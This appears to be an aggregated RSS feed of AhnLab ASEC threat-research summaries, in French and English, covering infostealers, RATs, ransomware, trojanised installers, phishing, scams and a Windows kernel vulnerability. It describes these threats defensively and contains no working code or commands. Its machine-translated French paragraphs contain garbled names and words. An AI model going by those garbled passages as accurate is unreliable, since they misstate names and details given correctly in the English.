This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-12T22:03:03+00:00 www.secnews.physaphae.fr AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert les circonstances d'une souche malveillante CHM qui vole les informations utilisateur étantdistribué aux utilisateurs coréens.Le CHM distribué est un type qui a été constamment distribué dans divers formats tels que LNK, DOC et Onenote du passé.Un léger changement dans le processus d'opération a été observé dans les échantillons récents.Le flux d'exécution global est illustré à la figure 1. Le malware est un type qui utilise plusieurs scripts pour finalement envoyer ...

---

AhnLab SEcurity intelligence Center (ASEC) has recently discovered circumstances of a CHM malware strain that steals user information being distributed to Korean users. The distributed CHM is a type that has been constantly distributed in various formats such as LNK, DOC, and OneNote from the past. A slight change to the operation process was observed in the recent samples. The overall execution flow is shown in Figure 1. The malware is a type that uses multiple scripts to ultimately send... ]]> 2024-05-08T01:16:38+00:00 https://asec.ahnlab.com/en/65245/ www.secnews.physaphae.fr/article.php?IdArticle=8495602 False Malware None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a découvert des preuves d'une souche malveillante distribuée aux serveurs Web au sudLa Corée, conduisant les utilisateurs à un site de jeu illégal.Après avoir initialement infiltré un serveur Web Windows Information (IIS) des services d'information sur Internet (IIS) mal gérés en Corée, l'acteur de menace a installé la porte arrière de METERPRETRER, un outil de transfert de port et un outil de logiciel malveillant du module IIS.Ils ont ensuite utilisé ProCDump pour exfiltrater les informations d'identification du compte du serveur.Les modules IIS prennent en charge les fonctionnalités d'extension des serveurs Web tels que ...

---

AhnLab SEcurity intelligence Center (ASEC) has discovered evidence of a malware strain being distributed to web servers in South Korea, leading users to an illegal gambling site. After initially infiltrating a poorly managed Windows Internet Information Services (IIS) web server in Korea, the threat actor installed the Meterpreter backdoor, a port forwarding tool, and an IIS module malware tool. They then used ProcDump to exfiltrate account credentials from the server. IIS modules support expansion features of web servers such as... ]]> 2024-05-08T00:59:58+00:00 https://asec.ahnlab.com/en/65131/ www.secnews.physaphae.fr/article.php?IdArticle=8495572 False Malware,Tool,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment identifié le remcosrat distribué à l'aide de la technique de stéganographie.Les attaques commencent par un document Word en utilisant la technique d'injection de modèle, après quoi un RTF qui exploite une vulnérabilité dans l'éditeur d'équation (Eqnedt32.exe) est téléchargé et exécuté.Le fichier RTF télécharge un VBScript avec le & # 8220; .jpg & # 8221;Extension de fichier à partir du C2 et un autre VBScript de & # 8220; Paste.ee & # 8221;, un service similaire à & # 8220; Pastebin & # 8221;où on peut télécharger du texte gratuitement.Le VBScript téléchargé est obscurci avec ...

---

AhnLab SEcurity intelligence Center (ASEC) has recently identified RemcosRAT being distributed using the steganography technique. Attacks begin with a Word document using the template injection technique, after which an RTF that exploits a vulnerability in the equation editor (EQNEDT32.EXE) is downloaded and executed. The RTF file downloads a VBScript with the “.jpg” file extension from the C2 and another VBScript from “paste.ee”, a service similar to “Pastebin” where one can upload text for free. The downloaded VBScript is obfuscated with... ]]> 2024-05-08T00:33:38+00:00 https://asec.ahnlab.com/en/65111/ www.secnews.physaphae.fr/article.php?IdArticle=8495573 False Vulnerability None 3.0000000000000000 AhnLab - Korean Security Firm avec l'avancement de la technologie d'arnaque, la détermination de l'authenticité d'un site uniquement basé sur l'apparence est devenue extrêmement difficile.Dans le passé, il a été possible d'identifier les contrefaçons en observant soigneusement les écarts tels que la taille du logo, la mise en page, le libellé, le domaine, etc., que les escrocs ont souvent négligé lors de la création de sites Web ou de courriels spoofed.Cependant, les escrocs modernes produisent désormais des conceptions et un contenu d'une telle sophistication qu'ils ressemblent étroitement aux sites Web et aux e-mails authentiques.La technologie de copie de site Web a progressé au point où il est ...

---

With the advancement of scamming technology, determining the authenticity of a site solely based on appearance has become exceedingly difficult. In the past, it was possible to identify fakes by carefully observing discrepancies such as logo size, layout, wording, domain, etc., which scammers often overlooked when creating spoofed websites or emails. However, modern scammers now produce designs and content of such sophistication that they closely resemble genuine websites and emails. Website copying technology has advanced to the point where it is... ]]> 2024-05-07T01:14:46+00:00 https://asec.ahnlab.com/en/65091/ www.secnews.physaphae.fr/article.php?IdArticle=8494923 False None None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a confirmé la distribution continue des fichiers de raccourci (* .lnk) detailles anormales qui diffusent des logiciels malveillants de type porte-porte.Les fichiers de raccourcis récemment confirmés (* .lnk) visent les utilisateurs sud-coréens, en particulier ceux liés à la Corée du Nord.Les noms de fichiers LNK confirmés sont les suivants: les fichiers LNK confirmés contiennent une commande pour exécuter PowerShell via CMD, et leur type est similaire au type trouvé dans & # 8220; ROKRAT MALWWare distribué via des fichiers LNK (* .lnk): redeedes (redeedes (Scarcruft) & # 8221; ...

---

AhnLab SEcurity intelligence Center (ASEC) has confirmed the continuous distribution of shortcut files (*.LNK) of abnormal sizes that disseminate backdoor-type malware. The recently confirmed shortcut files (*.LNK) are found to be targeting South Korean users, particularly those related to North Korea. The confirmed LNK file names are as follows: The confirmed LNK files contain a command to execute PowerShell via CMD, and their type is similar to the type found in “RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)”... ]]> 2024-05-07T00:50:55+00:00 https://asec.ahnlab.com/en/65076/ www.secnews.physaphae.fr/article.php?IdArticle=8494900 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm While monitoring attacks targeting MS-SQL servers, AhnLab SEcurity intelligence Center (ASEC) recently identified cases of theTargetCompany Ransomware Group Installation du ransomware Mallox.Le groupe Ransomware TargetCompany cible principalement les serveurs MS-SQL mal gérés pour installer le ransomware Mallox.Bien que ces attaques soient en cours depuis plusieurs années, nous allons ici décrire la corrélation entre les logiciels malveillants nouvellement identifiés et les cas d'attaque antérieurs impliquant la distribution du Coinmin Tor2Mine et des ransomwares bluesky.Semblable aux cas précédents, cette attaque a ciblé mal ...

---

While monitoring attacks targeting MS-SQL servers, AhnLab SEcurity intelligence Center (ASEC) recently identified cases of the TargetCompany ransomware group installing the Mallox ransomware. The TargetCompany ransomware group primarily targets improperly managed MS-SQL servers to install the Mallox ransomware. While these attacks have been ongoing for several years, here we will outline the correlation between the newly identified malware and previous attack cases involving the distribution of the Tor2Mine CoinMiner and BlueSky ransomware. Similar to previous cases, this attack targeted improperly... ]]> 2024-05-02T00:15:52+00:00 https://asec.ahnlab.com/en/64921/ www.secnews.physaphae.fr/article.php?IdArticle=8492099 False Ransomware,Malware None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a découvert une souche d'infosteller fabriquée avec un électron.Electron est un cadre qui permet de développer des applications à l'aide de JavaScript, HTML et CSS.Discord et Microsoft Vscode sont des exemples majeurs d'applications faites avec un électron.Les applications faites avec des électrons sont emballées et généralement distribuées au format d'installation du système d'installation scriptable Nullsoft (NSIS).L'acteur de menace de ce cas d'attaque a appliqué ce format d'installation au malware.[1] CAS # 1 Lorsque l'on exécute le malware, l'électron ...

---

AhnLab SEcurity intelligence Center (ASEC) has discovered an Infostealer strain made with Electron. Electron is a framework that allows one to develop apps using JavaScript, HTML, and CSS. Discord and Microsoft VSCode are major examples of applications made with Electron. Apps made with Electron are packaged and usually distributed in Nullsoft Scriptable Install System (NSIS) installer format. The threat actor in this attack case applied this installer format to the malware. [1] Case #1 When one runs the malware, the Electron... ]]> 2024-04-24T00:09:33+00:00 https://asec.ahnlab.com/en/64445/ www.secnews.physaphae.fr/article.php?IdArticle=8487701 False Malware,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment identifié la distribution de fichiers de phishing identiques à la connexion du site Web de portail coréenécrans.Les cas qui se font l'identité de plusieurs sites Web de portail coréen, les marques de logistique et d'expédition et les pages de connexion WebMail ont été très courantes du passé.* Dans les images de comparaison gauche / droite utilisée dans ce post, le côté gauche montre la page de phishing et le côté droit montre la page normale.La figure 1 montre des captures d'écran de la page de phishing qui se font l'identité de la page de connexion Naver et ...

---

AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of phishing files identical to Korean portal website login screens. Cases impersonating multiple Korean portal websites, logistics and shipping brands, and webmail login pages have been very common from the past. * In the left/right comparison images used in this post, the left side shows the phishing page and the right side shows the normal page. Figure 1 shows screenshots of the phishing page impersonating the Naver login page and... ]]> 2024-04-22T01:35:57+00:00 https://asec.ahnlab.com/en/64294/ www.secnews.physaphae.fr/article.php?IdArticle=8486554 False None None 2.0000000000000000 AhnLab - Korean Security Firm Pupy est une souche malveillante de rat qui offre un soutien à la plate-forme croisée.Parce qu'il s'agit d'un programme open-source publié sur GitHub, il est continuellement utilisé par divers acteurs de menace, y compris des groupes APT.Par exemple, il est connu pour avoir été utilisé par APT35 (qui aurait des liens avec l'Iran) [1] et a également été utilisé dans l'opération Earth Berberoka [2] qui ciblait les sites de jeux en ligne.Récemment, une souche de logiciels malveillante nommée Disy Dog a été découverte, qui est une version mise à jour de Pupy Rat ....

---

Pupy is a RAT malware strain that offers cross-platform support. Because it is an open-source program published on GitHub, it is continuously being used by various threat actors including APT groups. For example, it is known to have been used by APT35 (said to have ties to Iran) [1] and was also used in Operation Earth Berberoka [2] which targeted online gambling websites. Recently, a malware strain named Decoy Dog was discovered, which is an updated version of Pupy RAT.... ]]> 2024-04-18T07:46:32+00:00 https://asec.ahnlab.com/en/64258/ www.secnews.physaphae.fr/article.php?IdArticle=8484600 False Malware,Threat APT 35 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment identifié la distribution d'une version modifiée de & # 8220;mimetools.dll & # 8221;, un plug-in.Le fichier malveillant mimetools.dll en question a été inclus dans le fichier d'installation du package d'une certaine version du package Notepad ++ et déguisé en fichier de package légitime.Comme indiqué dans l'image ci-dessous, MiMetools est un module pour effectuer un codage Base64 et d'autres tâches.Il est inclus par défaut et ne nécessite pas que l'utilisateur l'ajoute manuellement ....

---

AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of a modified version of “mimeTools.dll”, a default Notepad++ plug-in. The malicious mimeTools.dll file in question was included in the package installation file of a certain version of the Notepad++ package and disguised as a legitimate package file. As shown in the image below, mimeTools is a module for conducting Base64 encoding and other tasks. It is included by default and does not require the user to add it manually.... ]]> 2024-04-15T01:12:41+00:00 https://asec.ahnlab.com/en/64106/ www.secnews.physaphae.fr/article.php?IdArticle=8482387 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert que le Metasploit Meterpreter Backdoor a été installé via le service Redis.Redis est une abréviation du serveur de dictionnaire distant, qui est un stockage de structure de données en mémoire open source qui est également utilisé comme base de données.Il est présumé que les acteurs de la menace ont abusé des paramètres inappropriés ou exécuté des commandes par le biais d'attaques de vulnérabilité.Redis est utilisé à diverses fins, les principaux étant la gestion de session, le courtier de messages et les files d'attente.Autant de systèmes partout ...

---

AhnLab SEcurity intelligence Center (ASEC) recently discovered that the Metasploit Meterpreter backdoor has been installed via the Redis service. Redis is an abbreviation of Remote Dictionary Server, which is an open-source in-memory data structure storage that is also used as a database. It is presumed that the threat actors abused inappropriate settings or ran commands through vulnerability attacks. Redis is used for various purposes with the main ones being session management, message broker, and queues. As many systems all over... ]]> 2024-04-11T00:36:25+00:00 https://asec.ahnlab.com/en/64034/ www.secnews.physaphae.fr/article.php?IdArticle=8479670 False Vulnerability,Threat None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert qu'il y avait un nombre croissant de cas où les acteurs de la menace utilisentYouTube pour distribuer des logiciels malveillants.Les attaquants ne créent pas simplement des canaux YouTube et distribuent des logiciels malveillants - ils volent des canaux bien connus qui existent déjà pour atteindre leur objectif.Dans l'un des cas, le canal ciblé comptait plus de 800 000 abonnés.Les acteurs de la menace qui abusent de YouTube distribuent principalement des infostelleurs.L'infostaler Redline qui a été distribué via YouTube en 2020 aussi ...

---

AhnLab SEcurity intelligence Center (ASEC) recently found that there are a growing number of cases where threat actors use YouTube to distribute malware. The attackers do not simply create YouTube channels and distribute malware-they are stealing well-known channels that already exist to achieve their goal. In one of the cases, the targeted channel had more than 800,000 subscribers. The threat actors who abuse YouTube are mainly distributing Infostealers. The RedLine Infostealer that was distributed via YouTube in 2020 as well... ]]> 2024-04-08T05:47:42+00:00 https://asec.ahnlab.com/en/63980/ www.secnews.physaphae.fr/article.php?IdArticle=8477929 False Malware,Hack,Threat None 3.0000000000000000 AhnLab - Korean Security Firm Les escroqueries d'investissement en ligne de nos jours ne sont plus un problème limité à des nations spécifiques, devenant désormais un problème social répandu.autour du globe.Les escrocs (criminels) trompent leurs victimes par des moyens illégaux et immoraux, extorquant des actifs financiers, notamment des espèces et des actifs virtuels.Ils font généralement partie d'un syndicat criminel structuré, où ils conçoivent des scénarios sophistiqués pour commettre & # 8220; transnational & # 8221;crimes de fraude.Tout le monde peut être victime de son expertise et de sa persuasion lisse, quel que soit l'âge, le revenu ou l'intelligence.Le ...

---

Online investment scams these days are no longer an issue limited to specific nations, now becoming a social issue prevalent around the globe. Scammers (criminals) deceive their victims through illegal and immoral means, extorting financial assets including cash and virtual assets from them. They are usually a part of a structured criminal syndicate, where they devise sophisticated scenarios to commit “transnational” fraud crimes. Anyone can fall victim to their expertise and slick persuasion, regardless of age, income, or intelligence. The... ]]> 2024-04-08T04:47:55+00:00 https://asec.ahnlab.com/en/63884/ www.secnews.physaphae.fr/article.php?IdArticle=8477904 False None None 2.0000000000000000 AhnLab - Korean Security Firm Récemment, Ahnlab Security Intelligence Center (ASEC) a découvert la distribution de Rhadamanthygroupware.L'acteur de menace a créé un faux site Web pour ressembler au site Web d'origine et exposé le site aux utilisateurs en utilisant la fonctionnalité publicitaire dans les moteurs de recherche.Le blog ASEC a précédemment couvert les logiciels malveillants distribués via ces fonctionnalités publicitaires des moteurs de recherche dans l'article intitulé & # 8220; Hé, ce n'est pas le bon site! & # 8221;Distribution des logiciels malveillants exploitant Google ADS Suivi [1].Le malware dans ...

---

Recently, AhnLab SEcurity intelligence Center (ASEC) discovered the distribution of Rhadamanthys under the guise of an installer for groupware. The threat actor created a fake website to resemble the original website and exposed the site to the users using the ad feature in search engines. ASEC Blog has previously covered malware distributed through such ad features of search engines in the article titled “Hey, This Isn’t the Right Site!” Distribution of Malware Exploiting Google Ads Tracking [1]. The malware in... ]]> 2024-04-04T01:13:01+00:00 https://asec.ahnlab.com/en/63864/ www.secnews.physaphae.fr/article.php?IdArticle=8475597 False Malware,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment détecté une tension de logiciels malveillants distribuée en utilisant le suivi de Google ADS Googlefonctionnalité.Les cas confirmés montrent que les logiciels malveillants sont distribués en se déguisant comme un programme d'installation pour des groupes de groupes populaires tels que Notion et Slack.Une fois les logiciels malveillants installés et exécutés, il télécharge des fichiers malveillants et des charges utiles du serveur de l'attaquant.Vous trouverez ci-dessous la liste des noms de fichiers qui ont été découverts jusqu'à présent.Ce type de logiciels malveillants est ...

---

AhnLab SEcurity intelligence Center (ASEC) has recently detected a malware strain being distributed by using the Google Ads tracking feature. The confirmed cases show that the malware is being distributed by disguising itself as an installer for popular groupware such as Notion and Slack. Once the malware is installed and executed, it downloads malicious files and payloads from the attacker’s server. Below is the list of the file names that have been discovered so far. This type of malware is... ]]> 2024-04-01T01:12:13+00:00 https://asec.ahnlab.com/en/63477/ www.secnews.physaphae.fr/article.php?IdArticle=8473793 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert le groupe Kimsuky distribuant des logiciels malveillants déguisés en installateur d'un coréeninstitution publique.Le malware en question est un compte-gouttes qui crée la porte dérobée Endoor, qui a également été utilisée dans l'attaque couverte dans le post précédent, «TrollAgent qui infecte les systèmes lors du processus d'installation du programme de sécurité (groupe Kimsuky)».[1] Bien qu'il n'y ait aucun enregistrement du compte-gouttes utilisé dans les attaques réelles, il y avait un cas d'attaque qui impliquait la porte dérobée ...

---

AhnLab SEcurity intelligence Center (ASEC) recently discovered the Kimsuky group distributing malware disguised as an installer from a Korean public institution. The malware in question is a dropper that creates the Endoor backdoor, which was also used in the attack covered in the previous post, “TrollAgent That Infects Systems Upon Security Program Installation Process (Kimsuky Group)”. [1] While there are no records of the dropper being used in actual attacks, there was an attack case that involved the backdoor created... ]]> 2024-03-26T02:04:48+00:00 https://asec.ahnlab.com/en/63396/ www.secnews.physaphae.fr/article.php?IdArticle=8470473 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm Le malware STALC déguisé en installateur est distribué en masse.Il a été identifié comme étant téléchargé via Discord, Github, Dropbox, etc. Compte tenu des cas de distribution en utilisant des itinéraires similaires, il devrait rediriger les victimes à plusieurs reprises à partir d'une page Web malveillante déguisée en page de téléchargement pour un certain programme à l'URL de téléchargement.Stealc est un infostecteur qui extorque une variété d'informations clés telles que le système, le navigateur, le portefeuille de crypto-monnaie, la discorde, le télégramme et les données du client par courrier.Le ...

---

The StealC malware disguised as an installer is being distributed en masse. It was identified as being downloaded via Discord, GitHub, Dropbox, etc. Considering the cases of distribution using similar routes, it is expected to redirect victims multiple times from a malicious webpage disguised as a download page for a certain program to the download URL. StealC is an Infostealer that extorts a variety of key information such as system, browser, cryptocurrency wallet, Discord, Telegram, and mail client data. The... ]]> 2024-03-21T04:19:08+00:00 https://asec.ahnlab.com/en/63308/ www.secnews.physaphae.fr/article.php?IdArticle=8467689 False Malware None 3.0000000000000000 AhnLab - Korean Security Firm Les navigateurs Web sont certains des programmes les plus couramment et fréquemment utilisés par les utilisateurs de PC.Les utilisateurs utilisent généralement des navigateurs pour rechercher des informations, envoyer et recevoir des e-mails et utiliser des services Web tels que les achats.C'est le cas pour les utilisateurs individuels et les employés qui mènent des activités dans les entreprises.Pour utiliser ces services, les utilisateurs sont généralement tenus de se connecter à leurs propres comptes.Comme la connexion à chaque fois pour utiliser chaque service est gênante, la plupart des navigateurs Web prennent en charge la connexion automatique ....

---

Web browsers are some of the programs most commonly and frequently used by PC users. Users generally use browsers to look up information, send and receive emails, and use web services such as shopping. This is the case for both individual users and employees conducting business in companies. To use these services, users are generally required to log in to their own accounts. As logging in every time to use each service is inconvenient, most web browsers support auto login.... ]]> 2024-03-19T23:12:21+00:00 https://asec.ahnlab.com/en/63174/ www.secnews.physaphae.fr/article.php?IdArticle=8466985 False None None 2.0000000000000000 AhnLab - Korean Security Firm l'escroquerie de sextorsion est définie comme le crime de victimes de chantage utilisant leurs informations sensibles pour infliger une grande détresse psychologique et extorquereux.Les victimes souffrent non seulement de pertes financières immédiates, mais aussi d'immenses chocs et de terreur, certains au point d'avoir leur vie quotidienne gravement touchée.Le contenu de définition de la définition est défini comme le crime de tromper les autres par des moyens immoraux pour les gains financiers, le vol de la propriété intellectuelle ou l'accès non autorisé aux actifs.Les escrocs (criminels, attaquants) utilisent principalement des canaux directs tels que ...

---

Sextortion scam is defined as the crime of blackmailing victims using their sensitive information to inflict great psychological distress and extort them. Victims not only suffer from immediate financial losses but also immense shock and terror, some to the point of having their daily lives severely impacted. Contents DefinitionScamming is defined as the crime of deceiving others via immoral means for financial gains, stealing intellectual property, or unauthorized access to assets. Scammers (criminal, attacker) mostly utilize direct channels such as... ]]> 2024-03-19T02:53:38+00:00 https://asec.ahnlab.com/en/63206/ www.secnews.physaphae.fr/article.php?IdArticle=8466415 False None None 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert la distribution de Cryptowire, une ransomware qui était autrefois virale dans2018. Cryptowire est principalement distribué via des e-mails de phishing et est fabriqué à l'aide du script AutOIT.Les principales fonctionnalités du ransomware copies et se collent dans le chemin «C \ Program Files \ Common Files» et enregistre un calendrier au planificateur de tâches pour maintenir la persistance.& # 160;& # 160;Le logiciel malveillant explore les environnements réseau locaux et connectés pour étendre le processus de chiffrement des fichiers, enregistre les données comme domaincheck.txt dans ...

---

AhnLab SEcurity intelligence Center (ASEC) recently discovered the distribution of CryptoWire, a ransomware that was once viral in 2018. CryptoWire is mainly distributed via phishing emails and is made using Autoit script. Main Features The ransomware copies and pastes itself in the path “C\Program Files\Common Files,” and registers a schedule to the task scheduler to maintain persistence.     The malware explores the local and connected network environments to expand the file encryption process, saves the data as domaincheck.txt in... ]]> 2024-03-19T02:27:37+00:00 https://asec.ahnlab.com/en/63200/ www.secnews.physaphae.fr/article.php?IdArticle=8466416 False Ransomware,Malware None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert les attaques continues d'Andariel Group & # 8217;.Il est à noter que des installations de Meshagent ont été trouvées dans certains cas.Les acteurs de la menace exploitent souvent Meshagent ainsi que d'autres outils de gestion à distance similaires car il offre diverses fonctionnalités de télécommande.Le groupe Andariel a exploité les solutions de gestion des actifs coréens pour installer des logiciels malveillants tels que Andarloader et ModelOader, qui sont les logiciels malveillants utilisés dans les cas précédents.En commençant par l'agent Innix dans le passé, le groupe ...

---

AhnLab SEcurity intelligence Center (ASEC) recently discovered the Andariel group’s continuous attacks on Korean companies. It is notable that installations of MeshAgent were found in some cases. Threat actors often exploit MeshAgent along with other similar remote management tools because it offers diverse remote control features. The Andariel group exploited Korean asset management solutions to install malware such as AndarLoader and ModeLoader, which are the malware used in the previous cases. Starting with Innorix Agent in the past, the group... ]]> 2024-03-19T01:50:49+00:00 https://asec.ahnlab.com/en/63192/ www.secnews.physaphae.fr/article.php?IdArticle=8466392 False Malware,Tool,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Généralement, des organisations telles que les instituts et les entreprises utilisent divers produits de sécurité pour prévenir les menaces de sécurité.Pour les seuls systèmes de point de terminaison, il n'y a pas seulement des solutions anti-malware, mais aussi des pare-feu, des solutions de défense appropriées et des produits tels que EDR.Même dans les environnements utilisateur généraux sans organisation distincte responsable de la sécurité, la plupart d'entre elles ont des produits de sécurité de base installés.Par exemple, la plupart des utilisateurs avec le dernier système d'exploitation Windows ont automatiquement un produit anti-malware tel que Microsoft Defender installé.Comme la plupart des utilisateurs ont de nos jours la sécurité ...

---

Generally, organizations such as institutes and companies use various security products to prevent security threats. For endpoint systems alone, there are not only anti-malware solutions, but also firewalls, APT defense solutions and products such as EDR. Even in general user environments without separate organization responsible for security, most of them have basic security products installed. For example, most of the users with latest Windows OS automatically have anti-malware product such as Microsoft Defender installed. As most users nowadays have security... ]]> 2024-03-18T04:50:37+00:00 https://asec.ahnlab.com/en/63145/ www.secnews.physaphae.fr/article.php?IdArticle=8465803 False None None 2.0000000000000000 AhnLab - Korean Security Firm l'appareil numérique que nous utilisons le plus dans notre vie quotidienne est le téléphone portable.Il est utilisé dans un large éventail d'activités quotidiennes telles que la communication, la recherche, le shopping, la paiement, la vérification de l'identité et l'investissement.Certaines personnes ne possèdent pas d'ordinateurs personnels, mais presque tout le monde de nos jours a des téléphones portables.Les escrocs visent les téléphones mobiles car ils sont les appareils les plus répandus et les plus utilisés.Ils utilisent un subterfuge et des escroqueries pour voler notre argent, nos informations et nos autorisations.Contenu ce texte ...

---

The digital device that we use the most in our daily lives is mobile phone. It is used in a wide range of daily activities such as communication, searching, shopping, making payment, verifying identity, and investing. Some people do not own personal computers, but almost everyone these days have mobile phones. Scammers aim for mobile phones because they are the most widespread, most utilized devices. They use subterfuge and scams to steal our money, information, and permissions. Contents These Text... ]]> 2024-03-14T00:38:40+00:00 https://asec.ahnlab.com/en/63054/ www.secnews.physaphae.fr/article.php?IdArticle=8464202 False Mobile None 2.0000000000000000 AhnLab - Korean Security Firm AhnLab Security Intelligence Center (ASEC) a récemment découvert la distribution d'un infosteur déguisé en installateur du lecteur Adobe.L'acteur de menace distribue le fichier en tant que PDF, incitant les utilisateurs à télécharger et à exécuter le fichier.Comme le montre la figure 1, le faux fichier PDF est écrit en portugais, et le message indique aux utilisateurs de télécharger le lecteur Adobe et de l'installer.En disant aux utilisateurs qu'Adobe Reader est tenu d'ouvrir le fichier, il invite l'utilisateur ...

---

AhnLab SEcurity intelligence Center (ASEC) recently discovered the distribution of an infostealer disguised as the Adobe Reader installer. The threat actor is distributing the file as PDF, prompting users to download and run the file. As shown in the Figure 1, the fake PDF file is written in Portuguese, and the message tells the users to download the Adobe Reader and install it. By telling the users that Adobe Reader is required to open the file, it prompts the user... ]]> 2024-03-12T00:47:25+00:00 https://asec.ahnlab.com/en/62853/ www.secnews.physaphae.fr/article.php?IdArticle=8462372 False Threat None 2.0000000000000000 AhnLab - Korean Security Firm un malware MSIX déguisé en tant que installateur de notion est distribué.Le site Web de distribution ressemble à celui de la page d'accueil de la notion réelle.& # 160;L'utilisateur obtient un fichier nommé & # 8216; notion-x86.msix & # 8217;En cliquant sur le bouton de téléchargement.Ce fichier est un programme d'installation de l'application Windows et il est signé avec un certificat valide.& # 160;L'utilisateur obtient la fenêtre contextuelle suivante lors de l'exécution du fichier.En cliquant sur le bouton Installer, la notion est installée sur le PC et est infectée par des logiciels malveillants.& # 160;Lors de l'installation, ...

---

An MSIX malware disguised as the Notion installer is being distributed. The distribution website looks similar to that of the actual Notion homepage.   The user gets a file named ‘Notion-x86.msix’ upon clicking the download button. This file is Windows app installer, and it is signed with a valid certificate.   The user gets the following pop-up upon running the file. Upon clicking the Install button, Notion is installed on the PC and is infected with malware.   Upon installing,... ]]> 2024-03-11T00:17:09+00:00 https://asec.ahnlab.com/en/62815/ www.secnews.physaphae.fr/article.php?IdArticle=8461886 False Malware None 2.0000000000000000 AhnLab - Korean Security Firm aperçu du 13 février 2024, Microsoft a annoncé une élévation du noyau Windows des privilèges Vulnérabilité CVE-2012-21338correctif.La vulnérabilité se produit à certains ioctl de & # 8220; appid.sys & # 8221;Connu sous le nom de pilote AppLocker, l'une des fonctionnalités Windows.L'acteur de menace peut lire et écrire sur une mémoire de noyau aléatoire en exploitant la vulnérabilité, et peut soit désactiver les produits de sécurité ou gagner le privilège du système.Avast a rapporté que le groupe de menaces Lazarus a récemment utilisé la vulnérabilité CVE-2024-21338 à désactiver les produits de sécurité.Ainsi, les utilisateurs de Windows OS sont ...

---

Overview On February 13th, 2024, Microsoft announced a Windows Kernel Elevation of Privilege Vulnerability CVE-2024-21338 patch. The vulnerability occurs at certain IOCTL of “appid.sys” known as AppLocker‘s driver, one of the Windows feature. The threat actor can read and write on a random kernel memory by exploiting the vulnerability, and can either disable security products or gain system privilege. AVAST reported that the Lazarus threat group has recently used CVE-2024-21338 vulnerability to disable security products. Thus, Windows OS users are... ]]> 2024-03-06T08:56:56+00:00 https://asec.ahnlab.com/en/62668/ www.secnews.physaphae.fr/article.php?IdArticle=8459725 False Vulnerability,Threat APT 38 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a trouvé de nombreux cas d'acteurs de menace attaquant les serveurs coréens vulnérables.Ce post présente l'un des cas récents dans lesquels l'acteur de menace \\ 'z0min \' a attaqué des serveurs coréens Weblogic.Z0miner a été présenté pour la première fois par Tencent Security, un fournisseur de services Internet chinois.https://s.tencent.com/research/report/1170.html (ce lien n'est disponible qu'en chinois.) Ces acteurs de menace ont une histoire de distribution de mineurs contre les serveurs vulnérables (Atlassian Confluence, Apache ActiveMq, Log4J, etc.), et ils étaient fréquemment mentionnés dans l'ASEC ...

---

AhnLab SEcurity intelligence Center (ASEC) has found numerous cases of threat actors attacking vulnerable Korean servers. This post introduces one of the recent case in which the threat actor \'z0Miner\' attacked Korean WebLogic servers. z0Miner was first introduced by Tencent Security, a Chinese Internet service provider. https://s.tencent.com/research/report/1170.html (This link is only available in Chinese.) These threat actors have a history of distributing miners against vulnerable servers (Atlassian Confluence, Apache ActiveMQ, Log4J, etc.), and they were frequently mentioned in the ASEC... ]]> 2024-03-06T01:26:31+00:00 https://asec.ahnlab.com/en/62564/ www.secnews.physaphae.fr/article.php?IdArticle=8459599 False Threat None 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Intelligence Center (ASEC) a récemment découvert la distribution des logiciels malveillants de secours via Anotepad, un en ligne gratuit en lignePlateforme de blocs-notes.Ledit malware prend en charge à la fois le format PE qui cible le système Windows et le format ELF qui cible le système Linux.Comme l'acteur de menace a utilisé la chaîne & # 8216; wingofgod & # 8217;Pendant le développement des logiciels malveillants, il est classé comme Wograt.& # 160;1. Cas de distribution, il est supposé que le WOGRAT a été continu en continu dans les attaques depuis la fin 2022 jusqu'à ...

---

AhnLab Security intelligence Center (ASEC) has recently discovered the distribution of backdoor malware via aNotepad, a free online notepad platform. Said malware supports both the PE format that targets the Windows system and the ELF format that targets the Linux system. As the threat actor used the string ‘WingOfGod’ during the development of the malware, it is classified as WogRAT.   1. Distribution Cases It is assumed that the WogRAT has continuously been used in attacks since late 2022 until... ]]> 2024-03-05T01:14:24+00:00 https://asec.ahnlab.com/en/62446/ www.secnews.physaphae.fr/article.php?IdArticle=8459088 False Malware,Threat None 2.0000000000000000 AhnLab - Korean Security Firm Vous ou quelqu'un près de vous est-il devenu victime d'une arnaque en ligne?Cet article vous présentera des escroqueries en ligne, comment les vagues des escrocs ciblent leurs victimes et de quelle manière, et quels dommages ils infligent.Ce contenu d'article est basé sur les données internes de l'AHNLAB ainsi que les informations disponibles en externe.Lorsqu'ils citent des informations externes, leurs sources ont été citées.Contenu Que sont les escroqueries en ligne?Escroqueries par rapport aux fraudes par rapport au phishing. Quelle est la mauvaise?Quels sont leurs objectifs?Qui ...

---

